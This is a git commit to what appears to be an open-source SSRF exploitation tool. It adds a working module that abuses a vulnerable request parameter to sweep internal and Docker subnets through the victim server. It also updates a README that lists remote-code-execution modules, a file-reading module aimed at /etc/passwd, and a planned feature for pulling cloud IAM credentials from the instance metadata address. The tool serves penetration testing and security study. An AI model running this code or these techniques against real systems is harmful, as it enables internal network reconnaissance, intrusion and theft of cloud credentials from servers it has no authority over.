MODULE - Network scan : HTTP ping sweep of the network

pull/2/head
Swissky 2018-10-16 22:42:39 +02:00
parent 65c73647f8
commit ed066d4622
3 changed files with 79 additions and 1 deletions

View File

@ -49,7 +49,11 @@ The following modules are already implemented and can be used with the `-m` argu
| `fastcgi` | FastCGI RCE |
| `redis` | Redis RCE |
| `github` | Github Enterprise RCE < 2.8.7 |
| `zaddix` | Zaddix RCE |
| `mysql` | MySQL Command execution |
| `smtp` | SMTP send mail |
| `portscan` | Scan ports for the host |
| `networkscan` | HTTP Ping sweep over the network |
| `readfiles` | Read files such as `/etc/passwd` |
## Contribute
@ -58,7 +62,6 @@ I <3 pull requests :)
Feel free to add any feature listed below or a new service.
- --level arg - ability to tweak payloads in order to bypass some IDS/WAF. E.g: `127.0.0.1 -> [::] -> 0000: -> ...`
- networkscan - same a portscan, we want to discover machines in the same network
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
- sockserver - SSRF SOCK proxy server - https://github.com/iamultra/ssrfsocks
- handle request with file in requester

View File

@ -10,6 +10,7 @@ author = "Swissky"
# https://spyclub.tech/2018/ssrf-through-gopher/
# https://github.com/eboda/34c3ctf/tree/master/extract0r
# https://infosec.rm-it.de/2018/07/29/isitdtu-ctf-2018-friss/
# http://shaobaobaoer.cn/archives/643/gopher-8de8ae-ssrf-mysql-a0e7b6
# Note
# This exploit is a Python 3 version of the Gopherus tool

74
modules/networkscan.py Normal file
View File

@ -0,0 +1,74 @@
"""
network scan
swissky@crashlab ~
$ curl -v "http://192.168.43.57"
* Rebuilt URL to: http://192.168.43.57/
* Trying 192.168.43.57...
* TCP_NODELAY set
* connect to 192.168.43.57 port 80 failed: Connexion refusée
* Failed to connect to 192.168.43.57 port 80: Connexion refusée
* Closing connection 0
curl: (7) Failed to connect to 192.168.43.57 port 80: Connexion refusée
swissky@crashlab ~
$ curl -v "http://192.168.43.56" 7
* Rebuilt URL to: http://192.168.43.56/
* Trying 192.168.43.56...
* TCP_NODELAY set
* connect to 192.168.43.56 port 80 failed: Aucun chemin d'accès pour atteindre l'hôte cible
* Failed to connect to 192.168.43.56 port 80: Aucun chemin d'accès pour atteindre l'hôte cible
* Closing connection 0
curl: (7) Failed to connect to 192.168.43.56 port 80: Aucun chemin d'accès pour atteindre l'hôte cible
swissky@crashlab ~
"""
from core.utils import *
from datetime import datetime
import sys, struct, socket
import logging
import concurrent.futures
name = "networkscan"
description = "Scan the network - HTTP Ping sweep"
author = "Swissky"
class exploit():
ips = set()
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
# concurrent requests in order to limit the time
self.add_range("192.168.1.0/24") # Default network
self.add_range("192.168.0.0/24") # Default network
self.add_range("172.17.0.0/16") # Docker network
self.add_range("172.18.0.0/16") # Docker network
with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor:
future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, "80"): ip for ip in self.ips}
def add_range(self, ip_cidr):
(ip, cidr) = ip_cidr.split('/')
cidr = int(cidr)
host_bits = 32 - cidr
i = struct.unpack('>I', socket.inet_aton(ip))[0] # note the endianness
start = (i >> host_bits) << host_bits # clear the host bits
end = start | ((1 << host_bits) - 1)
# excludes the first and last address in the subnet
for i in range(start, end):
self.ips.add(socket.inet_ntoa(struct.pack('>I',i)))
def concurrent_request(self, requester, param, host, port):
try:
payload = wrapper_http("", host, port.strip())
r = requester.do_request(param, payload)
if not "Connection refused" in r.text:
timer = datetime.today().time().replace(microsecond=0)
print("\t[{}] Found host :{}".format(timer, host+ " "*40))
timer = datetime.today().time().replace(microsecond=0)
except Exception as e:
pass